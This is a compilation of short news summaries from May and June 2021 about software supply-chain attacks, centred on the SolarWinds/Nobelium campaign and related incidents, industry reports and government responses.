Microsoft said that an attacker had gained access to one of its customer-service agents and then used information from that to launch hacking attempts against customers. The company said it had found the compromise during its response to hacks by a team it identifies as responsible for earlier major breaches at SolarWinds and Microsoft.

Ref - Reuters

_______________________________________________________________________________________

(June 28, 2021)


SolarWinds attack cost affected companies in key sectors 11% of total annual revenue

IronNet Cybersecurity released its 2021 Cybersecurity Impact Report assessing timely topics such as the estimated cost per enterprise of the SolarWinds cyber attack, executive-level engagement in attack responses, and the effect of information sharing on an organization’s overall security posture. Among the 85 percent of respondents affected by SolarWinds, nearly one-third said their organization felt a significant financial impact from the attack. In fact, the attack cost affected companies, on average, 11 percent of their annual revenue.


_______________________________________________________________________________________

(June 27, 2021)


IT companies bear brunt of new SolarWinds hacker attacks

IT companies have made up the majority of organizations targeted amid new activity by the group behind last year’s SolarWinds supply-chain attack, with at least one victim coming from Microsoft’s customer support ranks. The attack mostly targeted IT companies, which comprised 57% of total targets, followed by government (20%), and smaller percentages for non-governmental organizations and think tanks, as well as financial services.

Ref - ARNNet

_______________________________________________________________________________________

(June 26, 2021)


Microsoft says SolarWinds hackers attacked three in a new breach

Microsoft Corp. said the hackers behind the SolarWinds cyberattack recently compromised a new trio of victims using access to one of the company’s customer support agents. The hacked portal used by the individual agent contained information for a small number of customers, which the attackers used to launch a highly targeted attack.

Ref - Yahoo 

_______________________________________________________________________________________

(June 26, 2021)


Microsoft admits to signing rootkit malware in supply-chain fiasco

Microsoft has confirmed signing a malicious driver being distributed within gaming environments. This driver, called "Netfilter," is in fact a rootkit that was observed communicating with Chinese command-and-control (C2) IPs. The driver in question was seen communicating with China-based C&C IPs providing no legitimate functionality and as such raised suspicions.


_______________________________________________________________________________________

(June 25, 2021)


The majority of large businesses caught up in supply chain attacks last year

The majority of large enterprises (64 percent) suffered a software supply chain attack last year, according to a report from security company Anchore. The report states that the use of software containers is on the rise thanks to the widespread use of DevOps processes to speed up development. This report highlights that 60 percent of respondents have made securing the software supply chain a top initiative for 2022.

Ref - ITProportal 

_______________________________________________________________________________________

(June 25, 2021)


New Nobelium activity disclosed by Microsoft

The Microsoft Threat Intelligence Center is tracking new activity from the NOBELIUM threat actor, which includes password spray and brute-force attacks. The activity was largely focused on US interests, about 45%, followed by 10% in the UK, and smaller numbers from Germany and Canada. In all, 36 countries were targeted.

Ref - Microsoft 

_______________________________________________________________________________________

(June 24, 2021)


Atlassian bugs could have led to a 1-click takeover

A supply-chain attack could have siphoned sensitive information out of Jira, such as security issues on Atlassian cloud, Bitbucket, and on-prem products. By exploiting the bug, with just one click, an attacker could have siphoned sensitive information out of Jira. The flaws could have also enabled an attacker to take over accounts and to control some of Atlassian’s applications, including Jira and Confluence.

Ref - ThreatPost 

_______________________________________________________________________________________

(June 24, 2021)


The power of anonymity in supply chain security

A large number of MSPs are managing Microsoft 365 for clients. So it’s critical that they protect Microsoft 365 with an email security solution that is integrated with Microsoft 365 via API, sitting inside Microsoft’s architecture. This architectural structure has a number of advantages, including making the solution invisible to hackers in an MX record query and allowing for internal email scanning, which can thwart lateral phishing and ransomware attacks within Microsoft 365.


_______________________________________________________________________________________

(June 24, 2021)


Shifting left with analytics to identify software supply chain anomalies

The supply chain can be compromised in part due to a lack of security monitoring and oversight for the coding and delivery of software (continuous integration/continuous delivery (CI/CD) pipelines), which creates a dangerous security gap. This gap widens because security testing does not test for changes in the software systems.

 
_______________________________________________________________________________________

(June 24, 2021)


A supply-chain breach: Taking over an Atlassian account

On November 16, 2020, Check Point Research (CPR) uncovered chained vulnerabilities that together can be used to take over an account and control some of Atlassian apps connected through SSO. Further details about this have been recently released by Check Point. According to them, once the attacker leverages these vulnerabilities and takes over an account, he can plant backdoors that he can use in the future for his supply-chain attacks.

 
_______________________________________________________________________________________

(June 23, 2021)


SUNBURST: Attack Flow, C2 Protocol, and Prevention

The SUNBURST backdoor is not yet fully understood. Spanning almost 3500 lines of code, “obfuscated” with casual naming, trying to evade shallow review, it has many subtleties yet to uncover. The Cynet research team attempted to gain a better understanding of the command-and-control communication channel, its various stages, and conditions required for execution. The main goal of this investigation is to find infected beaconing machines.

Ref - CYNet 

_______________________________________________________________________________________

(June 22, 2021)


Hackers are trying to attack big companies, and small suppliers are the weakest link

Researchers at cybersecurity company BlueVoyant examined hundreds of SMB defense company subcontractor firms.. It was found that over half had severe vulnerabilities within their networks, including unsecured ports and unsupported or unpatched software, making them vulnerable to cyberattacks including data breaches and ransomware.

Ref - ZDNet 

_______________________________________________________________________________________

(June 22, 2021)


An unpatched flaw in Linux Pling Store apps could lead to supply-chain attacks

Cybersecurity researchers have disclosed a critical unpatched vulnerability affecting Pling-based free and open-source software (FOSS) marketplaces for Linux platform that could be potentially abused to stage supply-chain attacks and achieve remote code execution (RCE).


_______________________________________________________________________________________

(June 22, 2021)


Three lessons CISOs can learn from the SolarWinds cyberattack

Here are some lessons that CISOs learn from the SolarWinds incident to change the way they secure and manage their supply-chain infrastructure. Continuous visibility into interconnected networks, Inventory management with optimal cyber hygiene, implementation of a Zero trust model, and role-based access to privileged accounts can help minimize the risks.

 
_______________________________________________________________________________________

(June 22, 2021)


Government-mandated SBOMs to throw light on software supply chain security

An SBOM is effectively an ingredient list or a nested inventory, a formal record containing the details and supply chain relationships of various components used in building software. The EO requires NTIA to produce three proposed minimum elements that should go into any SBOM: data fields, operational considerations, and support for automation.

Ref - CSO Online 

_______________________________________________________________________________________

(June 22, 2021)


U.S. SEC probing SolarWinds clients over cyber breach disclosures

The U.S. Securities and Exchange Commission (SEC) has opened a probe into last year's SolarWinds cyber breach, focusing on whether some companies failed to disclose that they had been affected by the unprecedented hack. The SEC sent investigative letters late last week to a number of public issuers and investment firms seeking voluntary information on whether they had been victims of the hack and failed to disclose it.

Ref - Reuters 

_______________________________________________________________________________________

(June 21, 2021)


CISA doesn't know how many US federal agencies use firewalls

The Department of Homeland Security’s top cybersecurity agency doesn’t know how many agencies are segmenting their networks from unwanted outside traffic. The agency provided the answers in response to a February inquiry from Wyden’s office following a heated Senate Intelligence Committee hearing about the breach at the federal contractor SolarWinds.


_______________________________________________________________________________________

(June 21, 2021)


Attacks against container infrastructures increasing, including supply chain attacks

Hiding an attack during a CI build can succeed in most organizations’ CI environments. This attack targets supply-chain processes and could be modified to target other hidden supply chain components, processes, or even the build artifacts themselves, which can pose a severe threat.

 
_______________________________________________________________________________________

(June 21, 2021)


Lessons from the JBS attack for securing the manufacturing supply chain

There are several lessons from the JBS attack that will help manufacturing leaders secure their infrastructure. Organizations need to control access to ecosystem applications and automate identity governance. In addition, they need to strengthen authentication using Continuous Adaptive Risk and Trust (CARTA) and Zero Trust security and secure non-human identities.


_______________________________________________________________________________________

(June 21, 2021)


Software-container supply chain sees spike in attacks

Typosquatting and credential stuffing are two of the most common ways that attackers are attempting to target companies' container infrastructure and the Docker-image supply chain, with attacks climbing nearly 600% in the second half of 2020 compared with the same period a year ago.

Ref - Darkreading 

_______________________________________________________________________________________

(June 21, 2021)


SolarWinds hack could have been deterred by simple security measures

The SolarWinds hack, one of the largest cybersecurity incidents in U.S. history, may have been deterred or minimized if basic security measures had been put in place. CISA agrees that a firewall blocking all outgoing connections to the internet would have neutralized the malware.

Ref - The Hill

_______________________________________________________________________________________

(June 18, 2021)


Google dishes out homemade SLSA to thwart software supply-chain attacks

Google has proposed a framework called SLSA for dealing with supply chain attacks, a security risk exemplified by the recent compromise of the SolarWinds Orion IT monitoring platform. SLSA – short for Supply chain Levels for Software Artifacts and pronounced "salsa" for those inclined to add convenience vowels – aspires to provide security guidance and programmatic assurance to help defend the software build and deployment process.

Ref - The Register 

_______________________________________________________________________________________

(June 18, 2021)


How PAM can protect feds from third-party/ service account cyber attacks

PAM solutions manage and control privileged accounts by isolating, monitoring, recording, and auditing these account sessions, commands, and actions. Third parties and service accounts cannot do their jobs a majority of the time without elevated privileges for access – thus making them a de facto part of the agency enterprise.

Ref - Meritalk

_______________________________________________________________________________________

(June 17, 2021)


Firmware security requires firm supply chain agreements

According to Bloomberg, China’s theft of technology is the biggest threat to corporate America and the US military. And the Russians are experts at infiltrating the supply chain of trusted code as witnessed by the recent SolarWinds breach, along with 20-years’ worth of cyber espionage and attacks. Organizations need to actively embed security controls before they take possession of a product.


_______________________________________________________________________________________

(June 17, 2021)


Lessons learned from the SolarWinds cyberattack and the future of NY-DFS

The New York DFS alerted DFS-regulated entities of the SolarWinds Attack on December 18, 2020, through the "Supply Chain Compromise Alert." In general, DFS found that its regulated entities responded swiftly and appropriately with 94% of impacted companies removing the vulnerable systems caused by the SolarWinds hackers from their networks (and or patching them) within three days of being notified of the attack. However, DFS noted gaps in cybersecurity policies of several regulated entities, including irregularities in patching and patch management systems, etc.

Ref - Mondaq 

_______________________________________________________________________________________

(June 17, 2021)


UNC2465 cybercrime group launched a supply chain attack on CCTV vendor

An affiliate of the Darkside ransomware gang, tracked as UNC2465, has conducted a supply chain attack against a CCTV vendor Dahua’s SmartPSS Windows app. UNC2465 is considered one of the main affiliates of the DARKSIDE group, along with other affiliated gangs tracked by FireEye/Mandiant as UNC2628 and UNC2659.


_______________________________________________________________________________________

(June 17, 2021)


The SolarWinds attack and its lessons

The increase in sophisticated and complex cyber-attacks like SolarWinds requires a change in the traditional security paradigm by increasing the priority of cyber-security and policies. Two types of policies have been introduced, including the prevention and problem-solving policies.


_______________________________________________________________________________________

(June 16, 2021)


Everything you need to know about SolarWinds hack

The purpose of the hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad.

Ref - TechTarget 

_______________________________________________________________________________________

(June 16, 2021)


Smoking out a Darkside affiliate’s supply chain software compromise

Mandiant observed DARKSIDE affiliate UNC2465 accessing at least one victim through a Trojanized software installer downloaded from a legitimate website. While this victim organization detected the intrusion, engaged Mandiant for incident response, and avoided ransomware, others may be at risk. UNC2465’s move from drive-by attacks on website visitors or phishing emails to this software supply chain attack shows a concerning shift that presents new challenges for detection. 

Ref - FireEye
 
_______________________________________________________________________________________

(June 16, 2021)


New ThroughTek IoT supply chain vulnerability announced

DHS and Nozomi Networks Labs announced a new vulnerability discovered in a ThroughTek software component that’s used broadly by many security cameras and smart device vendors. The ThroughTek component is part of the supply chain for many original equipment manufacturers (OEMs) of consumer-grade security cameras and IoT devices. ThroughTek states that its technology is used by several million Internet of Things (IoT)-connected devices.


_______________________________________________________________________________________

(June 16, 2021)


Darkside operator involved in supply chain attack via CCTV vendor’s website

A cybercrime group that used to cooperate with the Darkside ransomware gang has breached the website of a CCTV camera vendor and inserted malware (SMOKEDHAM backdoor) in a Windows application the company’s customers were using to configure and control their security feeds. The malware was hidden inside a customized version of the Dahua SmartPSS Windows app that the unnamed CCTV vendor was providing to its customers.

Ref - The Record 

_______________________________________________________________________________________

(June 16, 2021)


Supply chain attacks and vulnerability disclosures

SolarWinds, giant aviation digital services provider SITA, and DevOps tool provider Codecov are among this year’s victims of supply chain attacks that continue to create a ripple effect of data breaches across their customers, exposing millions of records. The latest attack on supply chains is on Edward Don and Company, a known distributor of foodservice equipment and supplies in the U.S.

Ref - ECCouncil 

_______________________________________________________________________________________

(June 16, 2021)


SolarWinds’ transparency trying to ensure others are safer

Sudhakar Ramakrishna, President, and CEO at Solarwinds revealed his thoughts about the importance of continuous learning from everything, be it a bug or a cyber incident. These learnings will fortify what can be done going forward to make it that much more difficult for a threat actor to perform their attacks.

Ref - Carahsoft 

_______________________________________________________________________________________

(June 14, 2021)


How to ensure third parties don't compromise the organizational supply chain

Organizations can probably count many third-party vendors in their IT environment vital in storing, securing, and analyzing their data. Most times, however, companies only assess the security of these third-party products when they’re onboarded. There’s no continuous security analysis or assessment. They should demand a monthly security risk assessment report from all third-party vendors to glean details on all known issues in their product and infrastructure.


_______________________________________________________________________________________

(June 14, 2021)


Codecov to retire the Bash script responsible for supply chain attack wave

Codecov has introduced a new uploader that relies on NodeJS to replace and remove a Bash script responsible for a recent supply chain attack. The new uploader will be shipped as a static binary executable suitable for Windows, Linux, Alpine Linux, and macOS. Codecov's Bash uploader was the source of a string of supply chain attacks taking place around January 31, 2021, made public on April 15.

Ref - ZDNet 

_______________________________________________________________________________________

(June 13, 2021)


SolarWinds hack emboldened cyberattackers for ransomware attack spree

When a cyberattack successfully occurs on the scale of SolarWinds, history suggests hackers are emboldened to come back for more money, valuable data, and fame. The SolarWinds hackers' tactics and techniques worked so remarkably well last year that there was an incentive for them and others like them to keep going.

Ref - Yahoo 

_______________________________________________________________________________________

(June 11, 2021)


Monumental supply-chain attack on Airlines traced to APT41

A monster cyberattack on SITA, a global IT provider for 90 percent of the world’s airline industry, is slowly unfolding to reveal the largest supply-chain attack on the airline industry in history. After Air India revealed the details of its security breach, it became clear that the carriers were most likely dealing with one of the biggest supply-chain attacks in the airline industry’s history, potentially traced back to the Chinese state-sponsored threat actor APT41.

 
_______________________________________________________________________________________

(June 10, 2021)


Mitigating third-party risks with effective cyber risk management

When it comes to cybersecurity, all sides involved in a business have to hold up their end of the bargain. A customer organization has to understand that it retains responsibility for the data it shares with third parties and that the third parties that hold and use that data, are effectively an extension of the customer’s business.


_______________________________________________________________________________________

(June 10, 2021)


What SolarWinds taught enterprises about data protection

The SolarWinds breach has forced businesses worldwide to reconsider their approach to data protection and overall security. The event highlighted the level of potential devastation had the SolarWinds’ hackers chosen to encrypt the data and hold it for ransom. A recent report found the number of ransomware attacks grew by more than 150% in 2020, as cybercriminals took advantage of work-from-home vulnerabilities.


_______________________________________________________________________________________

(June 9, 2021)


Hardening the physical security supply chain to mitigate the cyber-risk

A recent report by Genetec found that 67% of physical security professionals, including Genetec's end users, integrators, and partners, are planning to prioritize their cybersecurity strategy in 2021. IP security cameras and other security devices are by their very nature connected to the internet. When not secured properly, any camera or access control device in the so-called IoT can be accessed remotely by just about anyone.

 
_______________________________________________________________________________________

(June 9, 2021)


How to stop SolarWinds-like hacks

Researchers from Ohio State University and Potomac Research LLC, led by Noeloikeau Charlot, published a paper on the idea of using “physically unclonable functions (PUFs).” At a microscopic level, even mass-produced computer chips have tiny differences from one chip to the next. For example, an online bank can check a device’s PUF to make sure that only someone with the right device is accessing a bank account. This can help detect the attacks involving bypass two-factor authentication, which SolarWinds attackers exploited.

Ref - Nautil.us 

_______________________________________________________________________________________

(June 9, 2021)


Stealthy Gelsemium cyberspies linked to NoxPlayer supply-chain attack

ESET researchers have linked a stealthy cyberespionage group known as Gelsemium to the NoxPlayer Android emulator supply-chain attack that targeted gamers earlier this year. According to reports from G DATA and Verint Systems, the cyberspies used spear-phishing emails with document attachments exploiting the CVE-2012-0158 Microsoft Office vulnerability to deliver the malware.


_______________________________________________________________________________________

(June 8, 2021)


Protecting Industrial Control Systems against cyberattacks

ICS infrastructures are challenged to confirm the security of the supply chain for the OT system devices and sensors they rely on. There is no requirement to comply with the ISO 27001-2013 standard, which means ICS operators must often verify the security of their suppliers themselves. For multiple reasons, supply chains cannot be assumed to be a trusted method of software deliveries.


_______________________________________________________________________________________

(June 8, 2021)


The next phase of software supply chain security

The recent executive order by President Joe Biden does several important things related to software supply chain security. It requires the NIST to develop baseline security standards for software used by government agencies. Those standards are required to encompass secure software development environments, including such actions as using administratively separate build environments; auditing trust relationships.


_______________________________________________________________________________________

(June 8, 2021)


The rise and rise of supply chain attacks

There are some driving forces behind the rising popularity of supply chain attacks. The cyber defenses of many high-value targets are in much better shape than before. Direct attacks against target systems may take a lot of effort and yield few results. Hence, it is more effective for cybercriminals to move up the software supply chain to exploit weak links outside their target’s cyber defenses.


 _______________________________________________________________________________________

(June 8, 2021)


Supply chain security awareness - Key risk factors

As the SolarWinds breach was underway, global supply chains elsewhere were pelted with an ongoing barrage of volatility: the COVID-19 pandemic dramatically shifted demand while pushing employees out of traditional office infrastructures and into their homes, growing trade conflicts rendered supply chain hardware and software at risk of weaponization, and significant changes in industrial regulation heaped expensive penalties and restrictions on already-stressed businesses.


_______________________________________________________________________________________

(June 7, 2021)


Defending against Software supply chain attacks: Recommendations from NIST

Given the sparsity of rapid mitigation options in the event of a software supply chain attack (because the victim organization doesn’t have the authority to command a timely response from their software vendor), it’s far more beneficial to invest in preventive measures. Experts recommend using a risk management lens when purchasing software and ask prospective vendors for compliance verifications.


_______________________________________________________________________________________

(June 6, 2021)


Why are supply chain attacks scary?

Supply chain attacks are scary because they're really hard to deal with, and because they make it clear you're trusting a whole ecology. You're trusting every vendor whose code is on your machine, and you're trusting every vendor's vendor. The rise in supply chain attacks, Berkeley's Weaver argues, may be due in part to improved defenses against more rudimentary assaults.

 
_______________________________________________________________________________________

(June 5, 2021)


CEO of Mandiant talks about SolarWinds hack

Kevin Mandia, CEO of Mandiant, pointed out in an interview at the WSJ Cybersecurity about the ongoing attempt to define what is and is not considered cyberwar and grounds for retaliation by the US government. He commented that “apparently supply chain attacks are fair game.”

Ref - Medium 

_______________________________________________________________________________________

(June 4, 2021)


Strengthening US cybersecurity: Impacts of the Executive Order

Even though the specifics of the executive order are not available today, compliance officers can start to anticipate the changes the business will need to make. First, they can expect to perform a fresh assessment of compliance risks under these new cybersecurity requirements. Second, they need to consider the new policies and procedures your business might need to implement.

Ref - JD Supra 

_______________________________________________________________________________________

(June 4, 2021)


As cyberattacks surge, Biden seeks to mount a better defense

As the cyber breaches pile up, cyber experts say it's important to note the country is facing two distinct threats. On one side is the SolarWinds attack, which was primarily an intelligence-gathering operation carried out by Russia's foreign intelligence service, the SVR, which was quietly stealing U.S. government secrets for months. On the other side is ransomware, which is surging. Russian criminal gangs are blamed for both the Colonial Pipeline attack and the hack that briefly shut down the world's largest meat supplier, JBS.

Ref - NPR

 _______________________________________________________________________________________

(June 3, 2021)


Dependency confusion: Compromising the supply chain

Researchers demonstrated that if a bad actor registers the private names on public package repositories and upload public libraries that contain malicious code, the code could be pushed from internal applications and results in data exfiltration or remote code execution. The researcher details how he successfully exploited this vector to infiltrate code and secure large bug bounties from Apple, Shopify, Microsoft, and PayPal among others.


_______________________________________________________________________________________

(June 3, 2021)


Organizations are still wondering about Dependency Confusion attacks

In early February of 2021, a vulnerability was revealed in the npm repository, infiltrating major technology companies, including Microsoft, Tesla, and Netflix. Although 35 companies were named, the issue affected many more, with hundreds of similar copycat efforts appearing on the npm repository. While routing rules can manage some of the issues around this for internal repositories, these require manual adjustment and quickly go out of date, so automation is necessary to keep on top of this issue.

Ref - Sonatype 

_______________________________________________________________________________________

(June 3, 2021)


Challenges with protecting the Supply Chain

With regards to protecting the supply chain, first businesses should take the steps to identify key assets, identify partners, and what access these partners have to the key assets. Industry frameworks like NIST, OWASP, CISSP Controls, etc, all stipulate the understanding of where critical assets are, be it hardware, software, endpoints, or applications. However, compiling these lists is a struggle for most. 

Ref - Toolbox 

_______________________________________________________________________________________

(June 3, 2021)


Japanese government agencies suffered supply chain attack exposing proprietary data

Several Japanese government agencies reportedly suffered data breaches originating from Fujitsu’s “ProjectWEB” information sharing tool. Fujitsu had earlier disclosed that hackers gained unauthorized access to the system and stole customer data. Investigators said that the cyber attack affected the Japanese Ministry of Land, Infrastructure, Transport, Tourism, the Cabinet Secretariat, and the Narita International Airport.

Ref - CPO Magazine 

_______________________________________________________________________________________

(June 2, 2021)


Proactive security key to combating supply chain attacks

Threat actors are becoming more sophisticated and are constantly evolving their capabilities to remain effective in their operations. To this end, organizations need to invest in the people, processes, and technology they deploy across their network in order to stand the best chance of preventing an attack. This will result in the development of capabilities and processes that will help to remediate any attacks as efficiently as possible, reducing the potential impact to both the organization and its customers.


_______________________________________________________________________________________

(June 1, 2021)


NobleBaron poisoned installers could be used in supply chain attacks

The latest wave of attacks being attributed to APT29/Nobelium threat actors includes a custom downloader that is part of a “poisoned update installer” for electronic keys used by the Ukrainian government. The latest iteration of malware activity linked to Nobelium uses a convoluted multi-stage infection chain that runs five to six layers deep. This includes the use of ‘DLL_stageless’ downloaders, called NativeZone.

Ref - SentinelOne 

_______________________________________________________________________________________

(June 1, 2021)


SolarWinds attack was an attack on trust

The SolarWinds hack last year offered some valuable insights into the true cost of a cyberattack, said Charl van der Walt, head of security research at Orange Cyberdefense, delivering one of the opening keynote addresses at the ITWeb Security Summit 2021. The impact is an attack on trust, and the consequence of this is fear, uncertainty, and doubt, which can be expensive and highly damaging.

Ref - IT Web 

_______________________________________________________________________________________

(June 1, 2021)


The U.S. seizes domains used by SolarWinds hackers

The U.S. Department of Justice (DoJ) disclosed that it intervened to take control of two command-and-control (C2) and malware distribution domains used in the recent attack campaign. The court-authorized domain seizure took place on May 28, the DoJ said, adding the action was aimed at disrupting the threat actors' follow-on exploitation of victims as well as block their ability to compromise new systems.


_______________________________________________________________________________________

(June 1, 2021)


Defining linchpins: An industry perspective on remediating Sunburst

The Atlantic Council’s latest report “Broken Trust: Lessons from Sunburst” introduces the concept of “linchpins,” which it defines as widely used software with significant permissions ... on which every other security program or critical resource depends, and which were a key factor in the Sunburst event. The report identifies challenges to identifying, securing, and triaging this linchpin software. 

Ref - CSO Online 

_______________________________________________________________________________________

(May 31, 2021)


CISA-FBI Alert: 350 organizations targeted in attack abusing email marketing service

According to the FBI and CISA, the attackers actually sent spear-phishing emails to over 7,000 accounts at 350 organizations, including government, non-governmental and intergovernmental organizations. The initial estimates said that the attack had targeted roughly 3,000 accounts across more than 150 organizations.


_______________________________________________________________________________________

(May 31, 2021)


Why are supply chain attacks so dangerous?

By compromising a single supplier, spies or saboteurs can hijack its distribution systems to turn any application they sell, any software update they push out, even the physical equipment they ship to customers, into Trojan horses. With one well-placed intrusion, they can create a springboard to the networks of a supplier's customers—sometimes numbering hundreds or even thousands of victims.

Ref - Wired

 _______________________________________________________________________________________

(May 31, 2021)


SolarWinds and Colonial Pipeline crisis showed 7 ways to respond to cyberattacks

The federal government and other agencies have demonstrated several crisis management best practices in response to the recent cyberattacks against SolarWinds and Colonial Pipeline. Business leaders should keep these best practices in mind when they have to deal with cyberattacks—and other crisis situations—at their companies and organizations.

Ref - Forbes

_______________________________________________________________________________________

(May 30, 2021)


Defending and deterring the Nobelium attacks

Microsoft provided several recommendations for protection against attacks like SolarWinds. The first step is to opt for better defense. The best defense, according to Microsoft, is to move to the cloud, where the most secure technology from any cloud provider is always up to date, and where the fastest security innovations are occurring. The second step is to deter damaging attacks. Clearer rules for nation-state conduct need to be defined and agreed to by the international community.

Ref - Microsoft 

_______________________________________________________________________________________

(May 29, 2021)


Biden budget sets aside $750 million for SolarWinds response

U.S. President Joe Biden's proposed budget includes $750 million for the government agencies hit by the SolarWinds hack to pay for cybersecurity improvements to prevent another attack. The money comes on top of a $500 million fund for federal cybersecurity as the U.S. government recovers from the cyberattack that hit nine agencies including the State Department and Treasury.

Ref - Yahoo
 
_______________________________________________________________________________________

(May 28, 2021)


Breaking down Nobelium’s latest early-stage toolset

Each of the NOBELIUM tools is designed for flexibility, enabling the actor to adapt to operational challenges over time. Microsoft Threat Intelligence Center (MSTIC) has released an appendix of indicators of compromise (IOCs) for the community to better investigate and understand NOBELIUM’s most recent operations.

Ref - Microsoft 

_______________________________________________________________________________________

(May 28, 2021)


Sophisticated spear-phishing campaign targets Government organizations, IGOs, and NGOs

CISA and FBI acknowledge open-source reporting attributing the activity discussed in the report to APT29 (also known as Nobelium, The Dukes, and Cozy Bear). However, CISA and FBI are investigating this activity and have not attributed it to any threat actor at this time. CISA and FBI urge governmental and international affairs organizations and individuals to adopt a heightened state of awareness and implement the recommendations specified in its advisory.

Ref - CISA 

_______________________________________________________________________________________

(May 28, 2021)


The key lesson from the SolarWinds hack is visibility

The SolarWinds attack has laid bare the interconnectedness of IT infrastructure: if most of the government and business infrastructure uses overlapping software packages, they are clearly not as separate from one another as they would like to think. Vulnerabilities could be anywhere throughout the supply chain. Why would hackers attack a single end-user when they can backdoor their way into all of them at once via a single service platform?

Ref - CIO 

_______________________________________________________________________________________

(May 28, 2021)


How Nobelium leveraged Constant Contact in the Phishing campaign

The May 25 phishing campaign included several iterations of emails sent from the Constant Contact account of USAID. In one example, the emails appear to originate from USAID. The emails posed as an “alert” from USAID dated May 25, 2021. If the user clicked the link on the email, the URL directs them to the legitimate Constant Contact service and then redirects to a Nobelium “controlled infrastructure.” A “malicious ISO” file was then delivered to the system.

Ref - CRN

 _______________________________________________________________________________________

(May 28, 2021)


Almost 3,000 emails targeted by Nobelium attack

The threat actor behind last year’s major SolarWinds hack has led a new targeted campaign spanning nearly 3,000 emails. According to reports, hackers accessed the Constant Contact account of USAID, the service used for email marketing. From there, Nobelium distributed phishing emails that, when clicked, inserted a malicious file used to distribute a backdoor called NativeZone. 

Ref - ARNNet 

_______________________________________________________________________________________

(May 28, 2021)


The group behind SolarWinds hack now targeting government agencies, NGOs - Microsoft

The group behind the SolarWinds cyberattack is now targeting government agencies, think tanks, consultants, and non-governmental organizations, Microsoft Corp said late on Thursday. While organizations in the United States received the largest share of attacks, targeted victims came from at least 24 countries, Microsoft said.

Ref - Reuters 

_______________________________________________________________________________________

(May 28, 2021)


Russia appears to carry out a hack through the system used by the U.S. Aid Agency

By breaching the systems of a supplier used by the federal government, the hackers sent out emails as recently as this week from more than 3,000 genuine-looking accounts. The email was implanted with code that would give the hackers unlimited access to the computer systems of the recipients, from stealing data to infecting other computers on a network.


 _______________________________________________________________________________________

(May 27, 2021)


Another Nobelium Cyberattack

Microsoft has observed cyberattacks by the threat actor Nobelium targeting government agencies, think tanks, consultants, and non-governmental organizations. This wave of attacks targeted approximately 3,000 email accounts at more than 150 different organizations. By piggybacking on software updates and now mass email providers, Nobelium increases the chances of collateral damage in espionage operations and undermines trust in the technology ecosystem.

Ref - Microsoft 

_______________________________________________________________________________________

(May 27, 2021)


Attack on Fujitsu’s ProjectWEB SaaS platform may be the next big supply chain attack

While still early, some researchers view the reported hacking into Fujitsu’s ProjectWEB software-as-a-service (SaaS) platform as a nation-state attack, not unlike the one that targeted the SolarWinds supply chain. Impacted agencies include the Ministry of Land, Infrastructure, Transport, and Tourism; the Ministry of Foreign Affairs; the Cabinet Secretariat; and Narita Airport in Tokyo.

Ref - SC Magazine 

_______________________________________________________________________________________

(May 27, 2021)


Canada Post falls victim to a third-party hack

Canada Post is the latest victim of a supply chain attack that allowed hackers to capture the names and addresses of almost one million senders and receivers of packages over a three-year period. This was the result of a cyberattack on its electronic data interchange (EDI) solution supplier, Commport Communications, which manages the shipping manifest data of large parcel business customers.


_______________________________________________________________________________________

(May 26, 2021)


The EU’s response to SolarWinds

Unofficial reports indicate that a number of EU member states are toying with the idea of introducing sanctions against Russian citizens who were allegedly involved in the SolarWinds campaign. Also, given the steady deterioration of EU-Russia relations in recent months, member states could be tempted to demonstrate their collective determination to push back against Russia and their commitment to the transatlantic alliance.

Ref - CFR 

_______________________________________________________________________________________

(May 26, 2021)


Newly discovered bugs in VSCode extensions could lead to supply chain attacks

Severe security flaws uncovered in popular Visual Studio Code extensions could enable attackers to compromise local machines as well as build and deployment systems through a developer's integrated development environment (IDE). The vulnerable extensions could be exploited to run arbitrary code on a developer's system remotely, in what could ultimately pave the way for supply chain attacks.


 _______________________________________________________________________________________

(May 26, 2021)


How SolarWinds changed cybersecurity leadership's priorities

The recent Scale survey showed that in wake of SolarWinds attacks, security leaders are retooling their security operations in response to the changing threat environment. For instance, 36% said that they expected third-party risks to rise over the next 12 months. Around 47% said third-party risks are a top factor affecting the C-suite's understanding of the business impact of security, behind data breaches at 57% and remote work at 54%.


_______________________________________________________________________________________

(May 26, 2021)


Federal Agencies struggling with supply chain security

More than five months after the SolarWinds supply chain attack came to light, federal agencies continue to struggle with supply chain security, according to a Government Accountability Office official. In the absence of foundational risk management practices, malicious actors may continue to exploit vulnerabilities in the ICT supply chain, causing further disruption to mission operations, harm to individuals, or theft of intellectual property.


_______________________________________________________________________________________

(May 25, 2021)


Supply chain attacks: How to reduce open-source vulnerabilities

Organizations are increasingly turning to adversary simulation engagements to reduce the impact of supply chain attacks. In these tests, a ‘red’ team uses the same tactics, techniques, and procedures that threat actors employ. The ‘blue’ team responds to the attacks from the red team. They’ll gain valuable knowledge by combating the same tools threat actors are currently using.


_______________________________________________________________________________________

(May 25, 2021)


How to avoid web supply chain attacks

The simplest thing that you may expect for secure interaction with your suppliers is that your contractors should present you with a web vulnerability scanner compliance report, such as the OWASP Top-10 report offered by Acunetix. This type of report will immediately show you if the software that you are purchasing has any vulnerabilities and if these are the types of vulnerabilities that you should worry about.


_______________________________________________________________________________________

(May 25, 2021)


Three-quarters of CISOs predict another SolarWinds-style attack

Some 84% of global organizations have suffered a serious security incident over the past two years and a majority are expecting another SolarWinds-style supply chain attack, according to a new Splunk report.


_______________________________________________________________________________________

(May 25, 2021)


Tailor security training to developers to tackle software supply chain risks

A lack of cohesion between software development teams and cybersecurity functions compounds the software supply chain risks faced by organizations, making it all the more urgent for cybersecurity leaders and their teams to better engage with and educate developers. The training must be tailored to address the specific cyber risks surrounding the software development lifecycle.

Ref - CSO Online 

_______________________________________________________________________________________

(May 24, 2021)


Recent cyberattacks signal alarm for better supply chain security

There are three important lessons from the fallout of recent major cyber incidents, including SolarWinds attacks. Any organization leveraging third-party software must not take its convenience and claims of being secure at face value but pay attention to the integrity of the services they use. There must be a focus on container security. Before integrating a third-party service, organizations need to ensure that these vendors’ security standards are up-to-par.

 
_______________________________________________________________________________________

(May 24, 2021)


SolarWinds, Exchange attacks revive calls for mandatory breach notification

On the heels of three major cybersecurity incidents over the past six months—the SolarWinds and Microsoft Exchange supply chain attacks and the Colonial Pipeline ransomware attack—government officials and some in the private sector are reviving calls for better information sharing and national breach notification requirements.

Ref - CSO Online 

_______________________________________________________________________________________

(May 21, 2021)


E-commerce giant Mercari suffers major data breach in Codecov incident

